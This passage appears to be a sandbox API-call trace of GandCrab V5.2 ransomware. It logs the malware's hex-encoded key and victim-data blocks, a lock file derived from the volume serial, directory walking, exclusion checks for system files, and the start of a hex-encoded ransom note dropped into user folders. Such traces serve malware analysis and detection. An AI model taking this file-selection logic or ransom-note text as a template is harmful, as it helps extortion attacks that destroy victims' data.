78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.914] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.915] CloseHandle (hObject=0x230) returned 1 [0096.915] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.915] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.915] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0xdf)) [0096.916] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.916] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.916] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.916] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned 53 [0096.916] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\saved games\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.917] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.917] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.918] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\") returned 29 [0096.918] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*") returned="C:\\Users\\Default\\Saved Games\\*" [0096.918] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503978 [0096.918] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.918] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.919] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.919] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.919] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.919] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.919] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.919] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Saved Games\\d2ca4a09d2ca4deb61a.lock" [0096.919] lstrlenW (lpString=".titwmvjl") returned 9 [0096.919] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned 53 [0096.919] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.919] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Saved Games\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 62 [0096.920] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\d2ca4a09d2ca4deb61a.lock") returned 53 [0096.920] lstrlenW (lpString=".lock") returned 5 [0096.920] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.920] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.920] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.920] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.920] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.920] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.920] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.920] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Saved Games\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Saved Games\\TITWMVJL-DECRYPT.txt" [0096.920] lstrlenW (lpString=".titwmvjl") returned 9 [0096.920] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 49 [0096.920] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.920] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Saved Games\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 58 [0096.920] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 49 [0096.920] lstrlenW (lpString=".txt") returned 4 [0096.921] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.921] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.921] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.921] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.921] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 49 [0096.921] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\TITWMVJL-DECRYPT.txt") returned 49 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.921] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.921] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.921] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.921] FindClose (in: hFindFile=0x503978 | out: hFindFile=0x503978) returned 1 [0096.922] CloseHandle (hObject=0x230) returned 1 [0096.922] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.922] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0096.922] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0096.922] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="SendTo" | out: lpString1="C:\\Users\\Default\\SendTo") returned="C:\\Users\\Default\\SendTo" [0096.922] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\Default\\SendTo\\") returned="C:\\Users\\Default\\SendTo\\" [0096.922] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.922] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.923] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.923] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.923] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.923] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.923] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.923] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.923] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.923] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\SendTo\\\\TITWMVJL-DECRYPT.txt") returned 45 [0096.923] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\sendto\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.927] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\